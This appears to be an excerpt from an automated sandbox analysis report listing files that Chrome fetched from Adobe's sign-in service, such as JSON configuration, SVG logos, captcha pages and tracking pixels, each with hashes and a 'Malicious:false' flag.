                                                                                                      SHA-512:30F8761974D46E601051BA9F764568C5E5687B17CB36891900C0AA195A1602966AE84C00FF8B022EA42A8650A925A48FC15941564A298413B7227D3F861E68D3
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/canvas/DanielCiocirlan.jpg
                                                                                                      Preview:......JFIF...........................................+......+&.%#%.&D5//5DNB>BN_UU_wqw................................+......+&.%#%.&D5//5DNB>BN_UU_wqw.............."..........4..................................................................)..2M....e.`.Fv.V(..+...Z#h...R...b0...L.0...2...R..j......0.P'.*.3......ug..Y.2.-&.P..M..,...f.=&.-...-....j#.<.YL.XZ[:.....R..-...[.,.7.e.jK....-(Qs..lV..2....T..6...@..3.[..U.....;$.6Fl.F4P ..B.E.FQz.T`Q..qR`*....2...F.e.2.(..,.L..#*...M.......[*.../7......W/.6.k .&.0...2...Vi@.L9l..`...+2..h...2..V.XZM...`Ue)h...(.52.3*...L..Q.....YXZL.PfV...0...-)te.T.......^..n.`.K(.@[N.X......P..4....i.#E...UT.F`..U.VR..NUa.Y.B.iVt...z...eY.,h.t.,K..5.RleZLk(g-.....3.4Z...EE.X....B.c*..E'i..2.c+..Q..e@(*.2..(..a........+"...=....z...,1.....gZ....r:9....x..?S.ec.T.a.e.XV.P..g..@....PT.de)J-(.DT`..i1.`..h+....X-&0.RmC...+(...#.3SEh-&.@.R,...@...-Zz.bRhZ,.Uj.g....FQU.`.!6.h.....l..J.E.i.*..gH..YV.e`...h..j-.dV.....Z*..*.h..M..h.\.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):101
                                                                                                      Entropy (8bit):4.701964949250391
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YRM9WREaDmzHQ2ERbLjHPUQISdQIUKIaivWMKzY:YsWiAmE2eLTUBS+KIn+Y
                                                                                                      MD5:5C66507BCDCE29F90DCFC79C5BCEBC89
                                                                                                      SHA1:2628A12E5A3C7CE5DE172317C6778FD50EFC00DA
                                                                                                      SHA-256:C3E33610767B4A32BF080E98C2F927A352ADAF49E50FD1E59C9228839AD1E302
                                                                                                      SHA-512:9220A64E418F627D330A3C99E53D24187CF7040D9DF187033BBADFCC95A378AFFB874CE3A5AA9AFE819B72CC2583E84C6EC8A84E0FB25E1F79EBD6B0A5F155E4
                                                                                                      Malicious:false
                                                                                                      Preview:{"timestamp":1731524042421,"status":400,"error":"Bad Request","path":"/core/v1/messaging/ui-version"}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.056564762130954
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YBAYQf/3W8WAEoMRcWgLECf61:YCH3+fRcWrCf0
                                                                                                      MD5:4295F497A947D87A11E54AF0BF361A6D
                                                                                                      SHA1:D340FA25D26353EE33B2EE86A76E3E7DB9C5B1A2
                                                                                                      SHA-256:4977D737FE5F2A1FF946175BF29BB646134FF8FA13C1DCBE41300BB5AB35FAD9
                                                                                                      SHA-512:3C6A504CA7CB944B8A96C133087FB7EDA8401C066910BA877B97B8F149B8FADABD687EB61AC727013EA6F55EC3BEEDA118BAAF03E104C9FA70A06805C1451CE0
                                                                                                      Malicious:false
                                                                                                      URL:https://adobe-api.arkoselabs.com/v2/430FF2C3-1AB1-40B7-8BE7-44FC683FE02C/settings
                                                                                                      Preview:{"default":{"settings":{"observability":{"enabled":false}}}}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.056564762130954
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YBAYQf/3W8WAEoMRcWgLECf61:YCH3+fRcWrCf0
                                                                                                      MD5:4295F497A947D87A11E54AF0BF361A6D
                                                                                                      SHA1:D340FA25D26353EE33B2EE86A76E3E7DB9C5B1A2
                                                                                                      SHA-256:4977D737FE5F2A1FF946175BF29BB646134FF8FA13C1DCBE41300BB5AB35FAD9
                                                                                                      SHA-512:3C6A504CA7CB944B8A96C133087FB7EDA8401C066910BA877B97B8F149B8FADABD687EB61AC727013EA6F55EC3BEEDA118BAAF03E104C9FA70A06805C1451CE0
                                                                                                      Malicious:false
                                                                                                      Preview:{"default":{"settings":{"observability":{"enabled":false}}}}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1313
                                                                                                      Entropy (8bit):5.025021159173509
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2dkLhlfPGmN6g4R+p6Epwta0J5JZvw1L58HxhfJGcwgYlfPRRHmC+CUcsF2gwEpL:csDGc2WDaJO1l8HHwgWoxOlEpL
                                                                                                      MD5:719F50A4CD34B0A7CA9E0A8FE11D9894
                                                                                                      SHA1:2B69DE659F2C0D3DA116FD1CA29B042A42BCC494
                                                                                                      SHA-256:4FECE4D460AC786D39640F7FB24FE3BF264CA0FBBB111E6A58C736F5F20271F2
                                                                                                      SHA-512:91FE3B547EE7A4AF8FBEC5BD6ADC0441447EE44E3834871BBBF7DD40D69633C3848CB3240AE50099DE3406FE44264F41CEDA06CD8B73A0EE3C2BEFCA025C5FDB
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/round/kakao.svg
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="28" height="28" viewBox="0 0 28 28">. <defs>. <style>. .cls-1 {. clip-path: url(#clippath);. }.. .cls-2 {. fill: none;. }.. .cls-2, .cls-3, .cls-4, .cls-5 {. stroke-width: 0px;. }.. .cls-6 {. mask: url(#mask);. }.. .cls-4 {. fill: #fee500;. }.. .cls-5 {. fill: #fff;. }. </style>. <clipPath id="clippath">. <rect class="cls-2" x="7" y="8.17" width="14" height="11.67"/>. </clipPath>. <mask id="mask" x="-43.91" y="-37.56" width="118.32" height="75.37" maskUnits="userSpaceOnUse">. <g id="mask0_523_4559" data-name="mask0 523 4559">. <path class="cls-5" d="m-43.91-37.56h118.32V37.81H-43.91V-37.56Z"/>. </g>. </mask>. </defs>. <rect class="cls-4" x="0" y="0" width="28" height="28" rx="14" ry="
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1313
                                                                                                      Entropy (8bit):5.025021159173509
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2dkLhlfPGmN6g4R+p6Epwta0J5JZvw1L58HxhfJGcwgYlfPRRHmC+CUcsF2gwEpL:csDGc2WDaJO1l8HHwgWoxOlEpL
                                                                                                      MD5:719F50A4CD34B0A7CA9E0A8FE11D9894
                                                                                                      SHA1:2B69DE659F2C0D3DA116FD1CA29B042A42BCC494
                                                                                                      SHA-256:4FECE4D460AC786D39640F7FB24FE3BF264CA0FBBB111E6A58C736F5F20271F2
                                                                                                      SHA-512:91FE3B547EE7A4AF8FBEC5BD6ADC0441447EE44E3834871BBBF7DD40D69633C3848CB3240AE50099DE3406FE44264F41CEDA06CD8B73A0EE3C2BEFCA025C5FDB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="28" height="28" viewBox="0 0 28 28">. <defs>. <style>. .cls-1 {. clip-path: url(#clippath);. }.. .cls-2 {. fill: none;. }.. .cls-2, .cls-3, .cls-4, .cls-5 {. stroke-width: 0px;. }.. .cls-6 {. mask: url(#mask);. }.. .cls-4 {. fill: #fee500;. }.. .cls-5 {. fill: #fff;. }. </style>. <clipPath id="clippath">. <rect class="cls-2" x="7" y="8.17" width="14" height="11.67"/>. </clipPath>. <mask id="mask" x="-43.91" y="-37.56" width="118.32" height="75.37" maskUnits="userSpaceOnUse">. <g id="mask0_523_4559" data-name="mask0 523 4559">. <path class="cls-5" d="m-43.91-37.56h118.32V37.81H-43.91V-37.56Z"/>. </g>. </mask>. </defs>. <rect class="cls-4" x="0" y="0" width="28" height="28" rx="14" ry="
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1395
                                                                                                      Entropy (8bit):5.208290651600866
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tsWIKcRjJhKjY5AV8LVM3xjMAQilUK4clMMAk2iIlXQLxGMA9boilT7OQw/acW/E:fITjVKVUYpQvK47PBOm9cs3wSTW8m
                                                                                                      MD5:02AC94A5A07350ADB0D698C5064D4E1B
                                                                                                      SHA1:CD1777F9A9FC8C7D764C6538F8A0610B6E9F2829
                                                                                                      SHA-256:52CFE86EC6730241C530C5617099657F9B7561994CD257E50ACA4E60737851FD
                                                                                                      SHA-512:90D090E2A4DC7951DBA3526E625DB0C96DA913E18E91867A51D1CAB21CC63F4B93DC3CBF1ECE258549EAB10C8E1E6F66A37427C49E51537CE64CCA907AE5EABE
                                                                                                      Malicious:false
                                                                                                      Preview:<svg id="Button_-_Google" data-name="Button - Google" xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50">. <rect id="Background" width="50" height="50" rx="25" fill="#fff"/>. <g id="Group_69890" data-name="Group 69890" transform="translate(13 10.771)">. <g id="logo_googleg_48dp" transform="translate(0 2.228)">. <path id="Shape" d="M20.52,9.818A13.788,13.788,0,0,0,20.3,7.364H9v4.642h6.458a5.52,5.52,0,0,1-2.395,3.622v3.011h3.878a11.7,11.7,0,0,0,3.578-8.82Z" transform="translate(3 2.455)" fill="#4285f4" fill-rule="evenodd"/>. <path id="Shape-2" data-name="Shape" d="M11.681,20.43a11.456,11.456,0,0,0,7.942-2.907l-3.878-3.011a7.24,7.24,0,0,1-10.778-3.8H.957v3.109A12,12,0,0,0,11.681,20.43Z" transform="translate(0.319 3.57)" fill="#34a853" fill-rule="evenodd"/>. <path id="Shape-3" data-name="Shape" d="M5.285,12.627a7.094,7.094,0,0,1,0-4.56V4.958H1.276a12.015,12.015,0,0,0,0,10.778l4.009-3.109Z" transform="translate(0 1.653)" fill="#fbbc05" fill-rul
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):62921
                                                                                                      Entropy (8bit):4.849160494541888
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:YZkTXdHEP0fCPP9ZsS4jEzjxE5rz2560AJv2ndnrEkUDdiTBRbV:YSTXdHEPCNjEzjm5rz2560AF2ndnrEkb
                                                                                                      MD5:479221735003F195FC966EE1A416FE45
                                                                                                      SHA1:F98F1834E1FB5C06CCE29EED1D3FF8B57CAAE836
                                                                                                      SHA-256:19486378CEF46557FEABDB715E35E5EA1DD4F6F4C516DD5F1B7C2C3FC2C9A659
                                                                                                      SHA-512:469BCFC6EC619CF387A0191994F951999788439F1AD64624C8B74A67DE9E50CD54F824B14B41B36D14846F8CFF71828EE7E7F3CB6D32DE8DD0ABB031D03FC9BB
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/8d9e4eb26/en_US/messages.json
                                                                                                      Preview:{"attributions":{"behance":"Behance","stock":"Stock","creativeCloud":"Creative Cloud"},"common":{"backBtn":"Back","goBackBtn":"Go back","resend":"Resend","learnMoreAccountTypes":"Learn more about account types","resendCode":"Resend Code","receiveCodeAnotherWay":"Receive code another way","back":"Sign in with a different email address","selectAccount":"Select an account","changeAccount":"Sign in to a different account","continue":"Continue","continueWithEmail":"Continue with email","signInWithPasskey":"Sign in with passkey","returnToSignIn":"Return to sign in","returnToSignUp":"Return to sign up","accept":"Accept","cancel":"Cancel","confirm":"Confirm","change":"Change","close":"Close","done":"Done","ok":"OK","signin":"Sign in","signout":"Sign out","learnMore":"Learn more","viewMore":"View more","viewLess":"View less","skip":"Skip","notNow":"Not now","steps":"Step {0} of {1}","retrieve":"Retrieve","signInWithCode":"Continue with code","accountTypes":{"individual":"Personal Account","ente
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2125
                                                                                                      Entropy (8bit):4.891233430290872
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Y0ZW3+3LwJSX5B5AKNrYUBjR3LENEJuNrE5vYWr1VANWKVFucVkLAgNs3BSPvT8z:Y0sOcyP5AYpw+JuhEZ7bU4qkULB0vC
                                                                                                      MD5:47A86FC387427D62E1B3E332E5EC47DC
                                                                                                      SHA1:ABA482C1B522E72A24A55805614095150031F8FC
                                                                                                      SHA-256:010F398A19CD28239BBEF458C7FECC94884923AC907F9ECD80F1C4D985C9D265
                                                                                                      SHA-512:BF2889CD03F091638501A54C98C165953A2AC92450F90F55AD1994797DF89F10ABC72EF5072F7E911D2D999AA25A740A4CAC673E4610FA4266F2C74CADCECAC6
                                                                                                      Malicious:false
                                                                                                      Preview:{"allowedAccountTypes":["enterprise","individual","entitlement","federated"],"accountCreationEnabled":true,"deviceOptInEnabled":false,"externalLinksEnabled":true,"cancelButtonEnabled":false,"jarvisV2Enabled":true,"fraudAiEnabled":false,"passwordlessOptInEnabled":false,"ssoEnabled":true,"chromelessLinksEnabled":false,"emailVerificationPolicy":"DELAYED","termsOfUseName":"ADOBE_MASTER","marketingConsentProfile":"trial","coppaEnforcement":"DateOfBirthOrExternal","reauthTtl":900,"retryAfter":3,"updatePasswordAllowedFactors":["EMAIL","PHONE","TOTP","PASSWORD","CODE_LOGIN"],"mfaInsteadOfCaptcha":true,"timeframeInvitesOutvites":604800000,"assetMigrationTimeout":180000,"type1MarketingConsentEnabled":false,"t2eDefaultFilter":"","t2eAccountFilteringEnabled":true,"recaptchaJsTimeoutMilli":5000,"externalContextMarker":"https://oobe.adobe.com/type3","contextSwitchingMarkerEnabled":false,"encodeExternalContextMarkerUrlEnabled":false,"arkoseCaptchaEnabled":true,"arkoseCaptchaSignInEnabled":true,"arkos
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (564)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):977
                                                                                                      Entropy (8bit):5.441675974366955
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:hR0VADq3AZcpJJYF155tdEUIzxTTBe1XI:TmsOpJ8ZEUIt9ea
                                                                                                      MD5:82D5E3DC3EC44DB5B43EDB9296856361
                                                                                                      SHA1:43F2A2C4E29B97A3E0D6282E7559CDA3BEB9545E
                                                                                                      SHA-256:501D1F396C87F675AB7E6C59227D32E7698082DD85B6BBE29AFB84485AB7CF6A
                                                                                                      SHA-512:8286C51CE02751D99E72803CA63E3C270E373EBEEF9C2A7016553AB760A86EE7DE2333A75E60383103FF87E8C2E181628389DC7E5E37A3790885DAB945D43B73
                                                                                                      Malicious:false
                                                                                                      URL:https://adobe-api.arkoselabs.com/v2/2.11.2/enforcement.680e9fec55645f785d2cc2dbf0b3e151.html
                                                                                                      Preview:<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta http-equiv="Content-Security-Policy" content="style-src 'self' 'nonce-9f921b27-740d-4162-8503-3d99588327cf'; default-src 'self' data: client-api.arkoselabs.com client-api.funcaptcha.com client-api.arkoselabs.cn client-api.arkose.com.cn cdn.arkoselabs.com cdn.funcaptcha.com;"><meta http-equiv="X-UA-Compatible" content="ie=edge"><style nonce="9f921b27-740d-4162-8503-3d99588327cf">html, body { margin: 0; padding: 0; height: 100%; }. * { box-sizing: border-box; }. #app { height: 100%; overflow: hidden; }</style></head><body><div id="app"></div><script type="text/javascript" id="enforcementScript" src="enforcement.680e9fec55645f785d2cc2dbf0b3e151.js" crossorigin="anonymous" integrity="sha384-XdDqf01rWffw1dqygIoN70JSduLSuk44/bN7TsyUpqqDnn+tni6qvGnEA8m1tncA" data-nonce="9f921b27-740d-4162-8503-3d99588327cf"></script></body></html>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):707
                                                                                                      Entropy (8bit):5.299043578011239
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:trOT8FuqGGNiHFu0wLHBIhRQAN4zUVX2aDG4fpDYtaDLe4zrVNeUKeN4f44igsKA:tKT8FuqGGNIu0wTQbNTXbDGCUtaDiOVN
                                                                                                      MD5:5802D46C081EB2B1B9FDF3E78CDD02EA
                                                                                                      SHA1:B4E4683477E447F588E03C13CDF469D886D44D50
                                                                                                      SHA-256:1A3823AEF10B6EDBD52C427AC06191787429DDABACCE30C11CA3A46E0B0FA008
                                                                                                      SHA-512:B0C21AB2C30AE3797A56CE2C98B063F6E14CEA00C9D9D210E75A23F992371D5FC4AAC1E449F2B07502A09446ADC02A92A46BC76AA6B0EF8C5B7C227465834A0E
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/sml-round-microsoft-logo.svg
                                                                                                      Preview:<svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="20" cy="20" r="19" fill="white" stroke="#E6E6E6" stroke-width="2"/>.<g clip-path="url(#clip0_6_2637)">.<path d="M12 12H28V28H12V12Z" fill="#F3F3F3"/>.<path d="M12.6956 12.6956H19.6522V19.6522H12.6956V12.6956Z" fill="#F35325"/>.<path d="M20.3478 12.6956H27.3044V19.6522H20.3478V12.6956Z" fill="#81BC06"/>.<path d="M12.6956 20.3478H19.6522V27.3043H12.6956V20.3478Z" fill="#05A6F0"/>.<path d="M20.3478 20.3478H27.3044V27.3043H20.3478V20.3478Z" fill="#FFBA08"/>.</g>.<defs>.<clipPath id="clip0_6_2637">.<rect width="16" height="16" fill="white" transform="translate(12 12)"/>.</clipPath>.</defs>.</svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):35
                                                                                                      Entropy (8bit):2.9302005337813077
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:CUHaaatrllH5:aB
                                                                                                      MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                      SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                      SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                      SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                      Malicious:false
                                                                                                      Preview:GIF89a.............,..............;
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1400
                                                                                                      Entropy (8bit):5.2053804842426485
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tsWIKcfjJhKjY5AV8LVM3xjMAQilUK4clMMAk2iIlXQLxGMA9boilT7OQw/acW/E:fIhjVKVUYpQvK47PBOm9cs3wSTW8m
                                                                                                      MD5:E3A1F922468504DD26B5BEB3FEB94C58
                                                                                                      SHA1:52EA51104CD2720EBE6282BD15CAFCFE92F83C57
                                                                                                      SHA-256:9F27DFEE04F2DD28B95E41E3D416FC4C26BCA076591FC15CF24AB5646F966599
                                                                                                      SHA-512:DF01B8E262C955823E5D99C28EBE79386175FF240C6A862A9961B851E7C2EC8C5931495F426D95FE031EEBA315FCD36E940A86A8A4E67301B288232927CAE69D
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/round/google.svg
                                                                                                      Preview:<svg id="Button_-_Google" data-name="Button - Google" xmlns="http://www.w3.org/2000/svg" width="50" height="50". viewBox="0 0 50 50">. <rect id="Background" width="50" height="50" rx="25" fill="#fff"/>. <g id="Group_69890" data-name="Group 69890" transform="translate(13 10.771)">. <g id="logo_googleg_48dp" transform="translate(0 2.228)">. <path id="Shape" d="M20.52,9.818A13.788,13.788,0,0,0,20.3,7.364H9v4.642h6.458a5.52,5.52,0,0,1-2.395,3.622v3.011h3.878a11.7,11.7,0,0,0,3.578-8.82Z" transform="translate(3 2.455)" fill="#4285f4" fill-rule="evenodd"/>. <path id="Shape-2" data-name="Shape" d="M11.681,20.43a11.456,11.456,0,0,0,7.942-2.907l-3.878-3.011a7.24,7.24,0,0,1-10.778-3.8H.957v3.109A12,12,0,0,0,11.681,20.43Z" transform="translate(0.319 3.57)" fill="#34a853" fill-rule="evenodd"/>. <path id="Shape-3" data-name="Shape" d="M5.285,12.627a7.094,7.094,0,0,1,0-4.56V4.958H1.276a12.015,12.015,0,0,0,0,10.778l4.009-3.109Z" transform="translate(0 1.653)" fill="#fbbc05" fil
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):35
                                                                                                      Entropy (8bit):2.9302005337813077
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:CUHaaatrllH5:aB
                                                                                                      MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                      SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                      SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                      SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                      Malicious:false
                                                                                                      URL:https://p.typekit.net/p.gif?s=1&k=ecr2zvs&ht=tk&h=auth.services.adobe.com&f=7180.7182.7184&a=1164490&js=1.21.0&app=typekit&e=js&_=1731524037578
                                                                                                      Preview:GIF89a.............,..............;
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1018
                                                                                                      Entropy (8bit):4.9180707096242395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tbMB0N6bJK+I6Ng9naR3n8BoDU/pfSXajb2X32Md/xWMd/qoMdjI:wvbJK+ImgdaR8oCpfL83Bd/xhd/qfdM
                                                                                                      MD5:2F5B6831B8B9863CA44D4C84427D55DB
                                                                                                      SHA1:041110F845CAD77582A009481BACB70EFDAC73E9
                                                                                                      SHA-256:D295C74ADFAD84A0D7C3E720A70126A7405B396D20A61CE25D1D67266D672E11
                                                                                                      SHA-512:5858F6D6224B27E6749E8D876F5FB956ECA710038E1D21AE43D740E6BF6B64EAC1EB91B79E6F266B8E78C62C2B5E07FC560E8847AA65ACF711CAA382476A63F0
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/generic/jarvis_bubble_chat.svg
                                                                                                      Preview:<svg id="production" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32">. <defs>. <style>. .cls-1 {. fill: #4b4b4b;. }. </style>. </defs>. <title>Artboard 68</title>. <path class="cls-1" d="M17.99316,30.06445a1.98415,1.98415,0,0,1-1.48828-.67383L10.82422,23H5.05957A5.0659,5.0659,0,0,1,0,17.93945V7.05957A5.06506,5.06506,0,0,1,5.05957,2H26.93994A5.06548,5.06548,0,0,1,32,7.05957V17.93945A5.06632,5.06632,0,0,1,26.93994,23H20v5.0625a1.98517,1.98517,0,0,1-1.28955,1.86914A2.00829,2.00829,0,0,1,17.99316,30.06445ZM5.05957,4A3.06278,3.06278,0,0,0,2,7.05957V17.93945A3.06361,3.06361,0,0,0,5.05957,21h6.21387a.99954.99954,0,0,1,.74756.33594L18,28.0625V22a.99974.99974,0,0,1,1-1h7.93994A3.06372,3.06372,0,0,0,30,17.93945V7.05957A3.06288,3.06288,0,0,0,26.93994,4Z"/>. <g>. <circle class="cls-1" cx="9.70414" cy="12.5" r="2.09862"/>. <circle class="cls-1" cx="16" cy="12.5" r="2.09862"/>. <circle class="cls-1" cx="22.29586" cy="12.5" r="2.09862
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):751
                                                                                                      Entropy (8bit):4.648170767212003
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4sBECSOn7QVP8B/HaqhAX7dU2SHalK3eRVnzKmQweoxGIJeJMcfNr77JBTyl1bj:t4sBjn7h1HaqAX7dtRK+Jz9eoxdJeJMZ
                                                                                                      MD5:A23D338C5AB2E6A2ECEAB9436B376308
                                                                                                      SHA1:45AE78B6650AA62FE93330806D5F5D430BF269B3
                                                                                                      SHA-256:F4B5AE2B108AC757F4EA43905CD55BE4816D65AE45CBF48FBE4AAB6AA1D6F92F
                                                                                                      SHA-512:FCAF93369A81BCE4B6441EEF3D294DE26CA5F8DFF34E63BA88BE0CA18ECB2C15097D5D26D64284CEEF00203B41EC6F87096697C493118DB6D7FDA49CE76B573B
                                                                                                      Malicious:false
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="26.034" height="32" viewBox="0 0 26.034 32"><g transform="translate(0 0)"><path d="M31.354,22.608a7.272,7.272,0,0,1,3.463-6.1,7.444,7.444,0,0,0-5.865-3.171c-2.468-.259-4.86,1.477-6.117,1.477-1.282,0-3.218-1.451-5.3-1.408a7.811,7.811,0,0,0-6.573,4.009c-2.842,4.921-.722,12.152,2,16.129,1.362,1.948,2.954,4.123,5.037,4.046,2.038-.085,2.8-1.3,5.26-1.3,2.438,0,3.152,1.3,5.277,1.251,2.187-.035,3.565-1.956,4.88-3.922a16.109,16.109,0,0,0,2.231-4.544,7.027,7.027,0,0,1-4.29-6.465Z" transform="translate(-9.609 -5.59)"/><path d="M23.551,12.976a7.16,7.16,0,0,0,1.638-5.13,7.285,7.285,0,0,0-4.714,2.439,6.813,6.813,0,0,0-1.681,4.94A6.024,6.024,0,0,0,23.551,12.976Z" transform="translate(-5.82 -7.847)"/></g></svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):707
                                                                                                      Entropy (8bit):5.299043578011239
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:trOT8FuqGGNiHFu0wLHBIhRQAN4zUVX2aDG4fpDYtaDLe4zrVNeUKeN4f44igsKA:tKT8FuqGGNIu0wTQbNTXbDGCUtaDiOVN
                                                                                                      MD5:5802D46C081EB2B1B9FDF3E78CDD02EA
                                                                                                      SHA1:B4E4683477E447F588E03C13CDF469D886D44D50
                                                                                                      SHA-256:1A3823AEF10B6EDBD52C427AC06191787429DDABACCE30C11CA3A46E0B0FA008
                                                                                                      SHA-512:B0C21AB2C30AE3797A56CE2C98B063F6E14CEA00C9D9D210E75A23F992371D5FC4AAC1E449F2B07502A09446ADC02A92A46BC76AA6B0EF8C5B7C227465834A0E
                                                                                                      Malicious:false
                                                                                                      Preview:<svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="20" cy="20" r="19" fill="white" stroke="#E6E6E6" stroke-width="2"/>.<g clip-path="url(#clip0_6_2637)">.<path d="M12 12H28V28H12V12Z" fill="#F3F3F3"/>.<path d="M12.6956 12.6956H19.6522V19.6522H12.6956V12.6956Z" fill="#F35325"/>.<path d="M20.3478 12.6956H27.3044V19.6522H20.3478V12.6956Z" fill="#81BC06"/>.<path d="M12.6956 20.3478H19.6522V27.3043H12.6956V20.3478Z" fill="#05A6F0"/>.<path d="M20.3478 20.3478H27.3044V27.3043H20.3478V20.3478Z" fill="#FFBA08"/>.</g>.<defs>.<clipPath id="clip0_6_2637">.<rect width="16" height="16" fill="white" transform="translate(12 12)"/>.</clipPath>.</defs>.</svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):344
                                                                                                      Entropy (8bit):4.7966070819921685
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:tI9mc4slzblftlGrUQtaKu4RnKSinpK/Ve9xXnpKlptMiSinpKFAmtMlxXnpK9L:t4NlfPGrUm6nAgXnAlVnAFABXnAt
                                                                                                      MD5:24E5106CCB2BAD68CBFD17822AB66C7C
                                                                                                      SHA1:96D0AE096B74550DEEC5DD54C6B98C9C6E3FA43F
                                                                                                      SHA-256:0703A621353241F2233FEDC6CD1B1231EAFD3FB611E1A5DE33AAD00A06111ADC
                                                                                                      SHA-512:EAE68A31B71C8FC855E9809FF7AF92310AE0FAD227780BBCE50C694962D2DA9A7A62AC9F3E3E1ABA85B06ADF31E9DD3585B379FDE327AB013DF075E452543A76
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/round/microsoft.svg
